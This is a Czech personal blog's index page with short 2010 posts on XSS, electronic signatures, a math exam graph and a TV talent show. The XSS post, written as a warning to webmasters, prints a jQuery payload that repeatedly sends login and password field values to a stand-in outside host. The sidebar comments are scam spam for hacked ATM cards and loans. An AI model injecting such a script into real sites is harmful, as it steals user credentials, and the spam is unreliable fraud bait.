| Michal Smrčka - blog

S XSS zranitelností se dá napáchat více škody, než si myslíte

Otázka pro webmastery: Víte, co dělá následující jQuery kód?

<script>$(function(){setInterval(function() {$.get('http://nejaky_web.cz/uloz_data.php', {jmeno: $('[name=l_jmeno]').val(), heslo: $('[name=l_heslo]').val() })},500);}); </script>

Pokud nevíte, a zároveň se někde na vašem webu vyskytuje výpis typu „echo $_POST[rocnik] “, upalujte svůj web opravit a vypisované parametry ošetřit.

Jestli provozujete web obsahující např. citlivá data uživatelů, pak vyloženě hazardujete. Za únik dat hrozí právní postih i vám, pokud se prokáže, že nebyla provedena ani nejzákladnější bezpečnostní opatření. Což obrana proti XSS bezesporu je. Více informací na Wikipedii.


13. 11. 2010 v 20:45 • Bezpečnost a hacking • autor Michal Smrčka1 komentář

Elektronický podpis - vyplatí se vůbec?

Elektronický podpis se v poslední době velmi rozšířil a může vám ušetřit spoustu času s vyřizováním na úřadech. Je to tak nebo se jej nevyplatí pořizovat?

digitální podpisZa elektronický podpis se v širším významu dá považovat jakékoliv uvedení identifikačních údajů autora do elektronického dokumentu. Takovýto podpis samozřejmě není schopen zaručit ani integritu ani autenticitu podepsaného. Avšak velmi často se tímto pojmem myslí zaručený elektronický podpis. Takovýto podpis zajišťuje pomocí kryptografických metod a dohledu nezávislé třetí strany (certifikační autority) integritu a autenticitu dat. Tím je zajištěno, že odesílatelem zprávy je skutečně ten, kdo předpokládáme a také to, že zpráva nebyla během přenosu změněna.


19. 10. 2010 v 20:17 • Reklamní sdělení • autor Michal Smrčka1 komentář

Státní maturita z matematiky nakreslená v Malování?

Ze zvědavosti jsem nahlédl do oficiálních testů nanečisto nových maturit z matematiky.

graf

hyperparabola

Já, kdybych byl takto narýsovaná parabola, asi bych si uvázal smyčku a na ose x bych se oběsil. Nevím, kdo to na ministerstvu školství schvaloval, ale mě by za takový graf vyrazili i ze semestrální písemky...

Prosím, řekněte těm na ministerstvu, že v Malování je vlevo ikonka, kterou se dají dělat kolečka, nemusí to bastlit tužkou! A křivka tam udělat taky jde. Ať to má aspoň trochu úroveň, né? :-)

(Přímý odkaz na zdrojové PDF, kdyby mi někdo nevěřil)


04. 09. 2010 v 19:38 • Ostatní • autor Michal Smrčka3 komentáře

Jak jsem "ukázal" talent v Talentmanii

Autorem tohoto textu je člověk, který chtěl zkusit štěstí v soutěži Talentmania. Ačkoli jde o reálný příběh, tak se kvůli obavám z pokuty 1.000 €, která mu hrozí za jakékoli hanění dobrého jména Talentmanie (součást smlouvy s TV Nova),  rozhodl raději nepublikovat svoje jméno.


Talentmania logoNastal ten dlouho očekávaný den, na který jsem se systematicky připravoval. Cvičil jsem dlouhé hodiny, odkládal aktivity, které by šly přednostně před „fingerstyle hrou“ na kytaru a otravoval blízké a příbuzné repeticí kompletního repertoáru, kterým jsem chtěl oslnit porotu, předvést se a udělat show.


01. 09. 2010 v 16:40 • Ostatní • autor Anonymní "soutěžící"22 komentářů

Kdo navrhoval prostředí diskuze na Novinky.cz?

Designer Programátor.

citace

Který laik ví, co je tag? Kdo umí běžně napsat [ ]? Kolik procent lidí rozumí XML syntaxi? Kdo dokázal plynule přečíst předchozí 3 otázky?


31. 08. 2010 v 21:38 • Webdesign • autor Michal Smrčka157 komentářů

Stránka: < 1 2 3 4 5 6 7 8 9 10 11 12 >

Kategorie blogu

Twitter feed

Poslední články

Poslední komentáře

María José: Get rich today and take the risk of transforming your own life.Try and get an ATM card blank today (CLIFFORD JACKSON) of cliffordhackerspays@­gmail.­com and be among the lucky ones who are benefiting from this card. This ATM card in white set is capable... Ukázat
Odenore omon: Dostal jsem svou již naprogramovanou a vyprázdněnou kartu ATM, abych stáhnul maximálně 1000 dolarů denně po dobu maximálně 20 dní. Jsem tak šťastný, protože jsem minulý týden dostal můj a použil jsem ho na získání 20 000 dolarů. Mike Fisher Hackers vydává kartu... Ukázat
Jessica Shannon Shirley: Dostal jsem svou již naprogramovanou a vyprázdněnou kartu ATM, abych stáhnul maximálně 1000 dolarů denně po dobu maximálně 20 dní. Jsem tak šťastný, protože jsem minulý týden dostal můj a použil jsem ho na získání 20 000 dolarů. Mike Fisher Hackers vydává kartu... Ukázat
Mr. Russell Logan: DO YOU NEED AN AFFORDABLE LOAN TODAY? We have provided over $1 Billion in business loans to over 15,000 business owners just like you. We use our own designated risk technology to provide you with the right business loan so you can grow your... Ukázat
Mr. Russell Logan: We give you loan with a low interest rate of 2% and loan duration of 1 to 30 years to pay back the loan (secure and unsecured). Do not keep your financial problems to yourself in order for you not to be debt... Ukázat

Vyhledávání

Nastavení

Velikost písma: Abc Abc Abc